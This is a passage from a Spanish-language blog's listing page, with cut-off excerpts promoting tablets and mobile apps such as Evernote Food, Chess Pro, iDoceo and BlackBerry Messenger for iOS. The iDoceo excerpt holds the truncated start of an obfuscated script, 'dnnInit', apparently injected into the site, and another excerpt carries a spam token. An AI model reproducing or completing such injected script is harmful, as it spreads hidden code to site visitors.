las más populares son estas dos. La libertad de los fabricantes en las pantallas a veces nos deja dispositivos curiosos y el último en englobar esta lista es uno de los integrantes de la familia Excite, los nuevos tablets de Toshiba. Un dispositivo de 13.3 pulgadas. Este modelo pretende acercarse a aquellos usuarios que no quedan conforme totalmente con los modelos de diez pulgadas. Si nos enfocamos en el hardware, no introduce grandes novedade…

des sociales como Facebook o Twitter. Para correr Evernote Food en nuestra Tablet, la misma debe contar con la versión 2.2 de Android o superiores y 10 MB de espacio disponible en memoria interna.   Enlace: Evernote Food Gratis para Tablet Android &nbsp …

…es y podremos crear temas de toda clase. Beautiful Widgets pondrá a nuestra disposición una vasta cantidad de visores de relojes, fecha, nivel de batería, estado del tiempo y demás, así como también una serie de interruptores para manejar ciertas funciones de nuestro dispositivo. En total esta herramienta nos brinda más de 1000 temas distintos, con la posibilidad de combinarlos entre sí generando entornos totalmente personalizados. Otras funcione…

En esta oportunidad presentamos Chess Pro, un excelente juego de ajedrez orientado hacia todo tipo de público debido a su gran flexibilidad en el sentido de la dificultad, teniendo diversos niveles para seleccionar y de esta manera ir ejercitando nuestro juego. Como bien sabemos, el ajedrez es considerado un deporte, si bien no físico, pero si mental, dónde a medida que avancemos en nuestra experiencia jugando nuestro cerebro se verá más lúcido …

Se confirmaron muchos de los rumores que se encontraban dando vueltas por la red. Intel, el fabricante número uno de procesadores dio a conocer Studybook, una tablet que se suma a la familia de sus dispositivos orientados a la enseñanza. El solo anuncio del lanzamiento del proyecto \”Una Laptop por Niño\” hace varios años desencadenó una carrera que tiene a Intel entre los principales protagonistas. El objetivo es simple: ofrecer eq…

…posibilitará la creación de nuestro propio perfil, pudiendo de esta manera agregar toda la información de interés necesaria, destacando por su parte que contaremos con una buena seguridad referida al aspecto de la privacidad. Para  correr BlackBerry Messenger en nuestro dispositivo iOS, el mismo debe contar con la versión 6.0 de iOS o superiores y 40 MB de memoria interna disponible. Enlace: BlackBerry Messenger para dispositivos iOS zp8497586rq …

En esta nueva oportunidad te presentamos una excelente aplicación llamada iDoceo, ideal para aquellos usuarios de dispositivos iPad dedicados a la enseñanza en diferentes niveles, ya sean primarios o superiores. Tendremos la posibilidad de realizar un seguimiento meticuloso de nuestros alumnos con la implementación de diferentes hojas de cálculo e iconos personalizables. function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,…

Apple, la compañía más grande en cuanto a la producción y venta de artículos tecnológicos en el mundo, actualmente domina por amplia mayoría la venta de tablets en el mundo, a comparación de su competencia directa: HP, Toshiba, Samsung, etcétera. El mercado de las tablets que ha crecido considerablemente este último año, ha puesto a trabajar muchos diseñadores, técnicos y publicistas debido a que las principales empresas que fabrican artículos t…

a población, ya sean nuestras fuerzas armadas, nuestro avance en temas económicos como también territoriales y muchos interesantes detalles extra. A su vez, debemos destacar que este título ha sido desarrollado exclusivamente para dispositivos táctiles y nos presentará unos gráficos verdaderamente fuera de serie. Si bien Total War Battles no es un juego que se pueda adquirir de manera gratuita, ya se pueden ver diversos comentarios rondando por l…

En esta nueva ocasión te ofrecemos Leonardo Interactivo, una aplicación compatible con dispositivos iOS que nos llevará a contemplar diversos manuscritos pertenecientes a Leonardo Da vinci, ideal para aquellos estudiantes y curiosos interesados en las ideas de este reconocido personaje de la historia. Dicha aplicación, cabe destacar, se ofrece de manera gratuita a través de la página oficial de Google Play. De esta manera se estima una inmensa c…



¿No encontraste lo que buscabas? ¡Probá con Google!